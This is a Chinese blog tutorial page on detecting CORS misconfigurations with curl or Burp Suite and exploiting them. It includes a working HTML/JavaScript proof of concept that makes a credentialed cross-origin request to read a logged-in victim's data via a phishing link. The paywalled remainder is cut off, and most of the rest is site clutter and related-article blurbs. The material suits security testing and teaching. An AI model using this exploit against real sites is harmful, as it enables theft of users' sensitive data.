CORS漏洞利用检测和利用方式

最新推荐文章于 2024-05-24 16:56:36 发布
最新推荐文章于 2024-05-24 16:56:36 发布
阅读量5.8k 收藏 8
点赞数 1
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/junsec/p/11221943.html
版权

  CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。

检测方式:

  1.curl访问网站  

  curl https://www.huasec.com -H "Origin: https://test.com" -I

  检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com

  2.burpsuite发送请求包,查看返回包

  

  tips:Access-Control-Allow-Origin的值,当其为null、意味着信任任何域。

漏洞利用:

  1.同于csrf跨站请求伪造,发送钓鱼链接,读取用户敏感数据。

  poc:

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" οnclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
    document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "https://target.com/info/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>

  用户点击button弹出响应信息

document.getElementById("demo").innerHTML = alert(this.responseText);

 上面代码只是弹出响应信息,你还可以获取cookie,针对http-only js代码无法读取的情况:

  




                

        

        




    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  san.hang
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    8
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
你可能不知道的CORS跨域资源共享

				
			

			

				

					10-17
				

			

		

		

			
				
主要给大家介绍了关于CORS跨域资源共享的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者使用CORS具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧

			
		

	



                

              
                



	

		

			

				
					
【Web漏洞】CORS跨域资源共享漏洞

				
			

			

				

					Butterfly0011的博客
				

				

					03-12
					
					4191
					
				

			

		

		

			
				
文章目录CORS跨域资源共享简单跨域请求非简单请求CORS的安全问题CORS漏洞的利用
有关于浏览器的同源策略和如何跨域获取资源,传送门 -->浏览器同源策略和跨域的实现方法
同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从...

			
		

	



                


  
              

                


	

		

			

				
					
CORS跨域资源共享漏洞的复现、分析、利用及修复过程

					
最新发布

				
			

			

				

					dzqxwzoe的博客
				

				

					05-24
					
					1235
					
				

			

		

		

			
				
CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,

			
		

	





	

		

			

				
					
掌握并理解 CORS (跨域资源共享)

				
			

			

				

					油墨香^-^的博客
				

				

					08-22
					
					2395
					
				

			

		

		

			
				
在本文中,咱们研究了同源策略以及如何在需要时使用CORS来允许跨源请求。这需要服务器和客户端设置,并且根据请求会出现预检请求。处理经过身份验证的跨域请求时,应格外小心。白名单可以帮助允许多个来源,而不会冒泄露敏感数据(在身份验证后受到保护)的风险。

			
		

	



		

			
		



	

		

			

				
					
使用CORS来进行跨域AJax请求

				
			

			

				

					冷月宫主的专栏
				

				

					05-12
					
					1934
					
				

			

		

		

			
				
以前出于安全考虑,javascript的Ajax请求都必须是同域下的,为了解决跨域请求大家无所不用其极,什么jsonp, 代理都是大家常用的方法,跨域需求这么大,于是现在还是搞了个CORS的跨域技术了。


Cross-Origin Resource Sharing (CORS)
Cross-Origin Resource Sharing (CORS) 是W3C草案拟定的浏览器与服务端如何

			
		

	





	

		

			

				
					
跨域资源共享CORS漏洞

					
热门推荐

				
			

			

				

					LuckySec
				

				

					08-22
					
					1万+
					
				

			

		

		

			
				
0x01 漏洞简介
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成跨域问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站跨域读取受害网站的敏感信息。

这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击

			
		

	





	

		

			

				
					
用于检测HTTP请求头缺失和CORS跨域漏洞的工具

				
			

			

				

					07-02
				

			

		

		

			
				
CORS配置错误可能导致安全漏洞,如未授权的数据访问或攻击者利用跨站请求伪造(CSRF)攻击。  工具的使用主要包括以下几个关键知识点:  1. **HTTP请求头检查**:  - **Content-Type**:检查是否正确指定了请求体...

			
		

	





	

		

			

				
					
Swagger API漏洞利用-JavaScript开发

				
			

			

				

					05-26
				

			

		

		

			
				
检测 API认证绕过漏洞 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用 使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口无法跨域请求的问题 当工具检测到HTTP认证绕过漏洞时,本地服务器...

			
		

	





	

		

			

				
					
swagger-exp:Swagger API漏洞利用

				
			

			

				

					03-25
				

			

		

		

			
				
Swagger API漏洞利用这是一个Swagger REST API信息可用的工具。主要功能有:遍历所有API接口,自动填充参数尝试GET / POST所有接口,返回响应代码/ Content-Type / Content-Length,用于分析接口是否可以未授权访问...

			
		

	





	

		

			

				
					
发现一款牛逼的 IDEA 插件:检测代码漏洞,一键修复!(csdn)————程序.pdf

				
			

			

				

					12-05
				

			

		

		

			
				
插件提供了多种安全漏洞的检测和修复,如:  1. **XXE漏洞**:插件能够检测并修复XML External Entity(XXE)漏洞,这是一种允许攻击者通过恶意构造的XML文档来获取服务器敏感信息的漏洞。 2. **Mybatis SQL注入**:...

			
		

	





	

		

			

				
					
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测

				
			

			

				

					03-06
				

			

		

		

			
				
瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成...

			
		

	





	

		

			

				
					
xray1.9.3最新社区高级版包含722POC 

				
			

			

				

					10-28
				

			

		

		

			
				
Xray1.9.3是一款备受瞩目的安全工具,专为IT领域的漏洞扫描和渗透测试而设计。这款最新版本的发布,带来了诸多优化和新功能,进一步提升了其在网络安全领域的应用价值。  首先,"更新日志"中提到的“做了一些优化”...

			
		

	





	

		

			

				
					
大厂面试-京东,2022年最新资源,祝您斩获高薪offer!

				
			

			

				

					05-09
				

			

		

		

			
				
SQLMap是一款自动化工具,它可以自动识别和利用SQL注入漏洞,通过各种技术如盲注、时间延迟注入等来测试注入点。  2. Masscan扫描端口:Masscan是一款快速的TCP端口扫描工具,它通过并行发送SYN包来检测端口开放情况...

			
		

	





	

		

			

				
					
web防数据库批量注入

				
			

			

				

					05-06
				

			

		

		

			
				
在网络安全领域,数据库批量注入和上传漏洞是两个重要的攻击手段,对Web应用程序的安全构成严重威胁。本文将深入探讨这两种威胁,以及如何防范它们,确保Web应用的稳定性与数据安全。  一、数据库批量注入  数据库...

			
		

	





	

		

			

				
					
Python-Pylava是一个用于Python和JavaScript的代码审计工具

				
			

			

				

					08-11
				

			

		

		

			
				
4. **安全检测**:Pylava还关注代码的安全性,例如检查SQL注入、跨站脚本(XSS)和其他常见的安全漏洞。  5. **性能优化**:通过分析代码,Pylava可以指出可能的性能瓶颈,如不必要的循环、过度复杂的计算等,帮助...

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞

				
			

			

				

					网络安全爱好者
				

				

					08-10
					
					6634
					
				

			

		

		

			
				
首先明白几个概念 Origin(源)、SOP(同源策略) 和 CROS(跨域资源访问) 分别是什么Origin三个要素构成了Origin,分别是访问 Web 内容时的协议(http://)域名(example.com)端口(:80)三者统称为源Origin详解SOP同源策略(Same Origin Policy),同源策略是基于浏览器的安全策略,它限制了网站之间不能随意互相读取和访问对方的资源。只有请求源(本地)和目标源(服务器)相同时,才能对相应资源进行读取。同源策略详解CORS。...

			
		

	





	

		

			

				
					
CORS跨域资源共享漏洞复现——详细利用方法,漏洞危害最大化

				
			

			

				

					面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
				

				

					06-15
					
					4611
					
				

			

		

		

			
				
CORS跨域资源共享漏洞,漏洞复现,cors利用方式以及让危害最大化。

			
		

	





	

		

			

				
					
cors跨域资源共享漏洞检测

				
			

			

				

					05-17
				

			

		

		

			
				
CORS(跨来源资源共享)是一种机制,它允许网页应用程序访问不同源的服务器资源。CORS漏洞可能会导致恶意攻击者能够从一个网站...在进行CORS漏洞检测时,建议使用多种不同的工具和技术,以确保发现所有可能存在的漏洞。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值